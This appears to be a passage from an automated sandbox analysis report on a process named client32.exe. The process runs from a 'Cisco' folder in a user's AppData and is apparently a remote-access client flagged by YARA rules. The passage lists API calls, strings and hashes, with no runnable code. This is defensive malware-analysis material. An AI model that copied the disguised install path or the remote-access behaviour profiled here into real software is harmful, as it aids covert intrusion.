                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11143416
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                                                                                    • API String ID: 1985783259-2296142801
                                                                                                                                                                                                    • Opcode ID: 49b4075091a4bd02719332453742c8c3b2f1a897a656e3109efce4d1bff81ff6
                                                                                                                                                                                                    • Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49b4075091a4bd02719332453742c8c3b2f1a897a656e3109efce4d1bff81ff6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11031376
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                                    • String ID: %s%s.bin$141700$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                                                                                    • API String ID: 4180936305-2915144016
                                                                                                                                                                                                    • Opcode ID: f311d18d2f481ca5885ce355be75c6d4215bfffd3506407d5c18b0736edccc2f
                                                                                                                                                                                                    • Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f311d18d2f481ca5885ce355be75c6d4215bfffd3506407d5c18b0736edccc2f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FAE
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11141FC4
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                                                                                    • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                                                                                    • API String ID: 3779116287-2600120591
                                                                                                                                                                                                    • Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                                                                                    • Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$CreateEventwsprintf
                                                                                                                                                                                                    • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                                                                                    • API String ID: 3065521449-2390547818
                                                                                                                                                                                                    • Opcode ID: eb8ffa7d751a0fb838dc8276ecb5f60825835a81c539c39725b34b54d8106a16
                                                                                                                                                                                                    • Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb8ffa7d751a0fb838dc8276ecb5f60825835a81c539c39725b34b54d8106a16
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile$CloseHandle
                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                    • API String ID: 1443461169-123907689
                                                                                                                                                                                                    • Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                                                                                    • Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 689B6691
                                                                                                                                                                                                    • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 689B66A2
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 689B66CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Cannot resolve hostname %s, error %d, xrefs: 689B66D6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastgethostbynameinet_addr
                                                                                                                                                                                                    • String ID: Cannot resolve hostname %s, error %d
                                                                                                                                                                                                    • API String ID: 2520508281-1802540647
                                                                                                                                                                                                    • Opcode ID: 0620cbce80b45ad5af9a467fe1fbed606f5c7602f9a43c356a99314e3e5ba716
                                                                                                                                                                                                    • Instruction ID: 32682fadb9d3bf818b356323f7034c36583894508ba72571f805ffd42c4f411a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0620cbce80b45ad5af9a467fe1fbed606f5c7602f9a43c356a99314e3e5ba716
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F21B736A006089BDB10DFB4DC40BAAB3FCBF59214F80C599E919D7280EF31E944CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,BBC4A55B,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                    • CreateEventA.KERNEL32 ref: 1102CD8A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Create$wsprintf
                                                                                                                                                                                                    • String ID: Client$DisableGeolocation
                                                                                                                                                                                                    • API String ID: 3257991914-4166767992
                                                                                                                                                                                                    • Opcode ID: a0e31b12da12a7498f8e628daecd04d7d44295960fafd86e3c528dcff422f91c
                                                                                                                                                                                                    • Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0e31b12da12a7498f8e628daecd04d7d44295960fafd86e3c528dcff422f91c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,765A83E0,76591970,76595C90,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
                                                                                                                                                                                                      • Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 11026E60
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 11026E66
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                                                                                    • String ID: Exit Msgloop, quit=%d
                                                                                                                                                                                                    • API String ID: 3212272093-2210386016
                                                                                                                                                                                                    • Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                                                                                    • Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1101761D
                                                                                                                                                                                                      • Part of subcall function 11017520: WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 1101755C
                                                                                                                                                                                                      • Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                                                                                      • Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                                                                                      • Part of subcall function 11017440: WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 11017472
                                                                                                                                                                                                      • Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                                                                                      • Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000304), ref: 1101763D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11017643
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountInitializeObjectSingleTickUninitializeWait$Event
                                                                                                                                                                                                    • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                                                                                    • API String ID: 3357037191-4122679463
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 689B5014
                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,689B8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 689B5034
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,689B8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 689B503D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                                                                                                    • String ID: GetModuleFileNameExA
                                                                                                                                                                                                    • API String ID: 4084229558-758377266
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 689B4FC4
                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,689B8E0D,00000000,?,689B8E0D,00000000,?,00000FA0,?), ref: 689B4FE4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,689B8E0D,00000000,?,00000FA0,?), ref: 689B4FED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                                                                                                    • String ID: EnumProcessModules
                                                                                                                                                                                                    • API String ID: 3858832252-3735562946
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateHandleThread
                                                                                                                                                                                                    • String ID: *AutoICFConfig$Client
                                                                                                                                                                                                    • API String ID: 3032276028-59951473
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 1106FDC7
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                                                                    • String ID: Push
                                                                                                                                                                                                    • API String ID: 1566154052-4278761818
                                                                                                                                                                                                    • Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                                                                                    • Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C300D
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 689C301B
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(-000397B9), ref: 689C307F
                                                                                                                                                                                                    • SetEvent.KERNEL32(000002F8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,976034B3), ref: 689C308C
                                                                                                                                                                                                      • Part of subcall function 689C28D0: wsprintfA.USER32 ref: 689C2965
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked$CountDecrementEventExchangeTickwsprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2350468054-0
                                                                                                                                                                                                    • Opcode ID: 41934ee078fdb575cc68dbf2363f042be5fde04e23f88f59b689ae45eee9f291
                                                                                                                                                                                                    • Instruction ID: 40f8937d491205ff38c98e8ccb1ea0699612c53555d3493bac4dbe4930ab4cf8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41934ee078fdb575cc68dbf2363f042be5fde04e23f88f59b689ae45eee9f291
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 794143B6D04209AFDB04CFB9D844AEFB7BCAF58304F408519E516E7240E771D645CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000000,?,?,?,689BDA7F,?,00000000), ref: 689BA503
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 689BA568
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,689BDA7F,?,00000000), ref: 689BA581
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,00000000), ref: 689BA5B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4212191310-0
                                                                                                                                                                                                    • Opcode ID: c33396c85e033d1041ed65e141c8eb8bdc4fe928bb09c8a18dd4e6ca7289ce4b
                                                                                                                                                                                                    • Instruction ID: 9c60600571528d4b1fb368744f781d77385e44bdb37aa7fba6267c9bf9a1840a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c33396c85e033d1041ed65e141c8eb8bdc4fe928bb09c8a18dd4e6ca7289ce4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E2107B6909614AFDB158F18E944B9FB7FDAF82328F810426D82AA3200D3B1E940CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                    • API String ID: 2251294070-2364992241
                                                                                                                                                                                                    • Opcode ID: 25a4bea00498d77d58fd3c12edc1f3de12433bdfe34951dec407084350f47ebf
                                                                                                                                                                                                    • Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25a4bea00498d77d58fd3c12edc1f3de12433bdfe34951dec407084350f47ebf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,?,00000100), ref: 11087B61
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11087B78
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Unknown resource message %d, xrefs: 11087B72
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                                                                                    • String ID: Unknown resource message %d
                                                                                                                                                                                                    • API String ID: 104907563-2992420014
                                                                                                                                                                                                    • Opcode ID: 230266bf9d81e5302b63695d1cbe2cd380382cc3620fe64c4cd87a616e8e186b
                                                                                                                                                                                                    • Instruction ID: 1f0bb5d028b1e2f017ab8d3d7faeb30ed711f365299c9935b8e63743bfbb120c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 230266bf9d81e5302b63695d1cbe2cd380382cc3620fe64c4cd87a616e8e186b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D001C4B5A00218ABC710DF59DC81FEEF7BCEB49704F004599FA0497140DAB0AA54CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110151D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                                                                                                                    • API String ID: 3498533004-85019792
                                                                                                                                                                                                    • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                                                                                    • Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
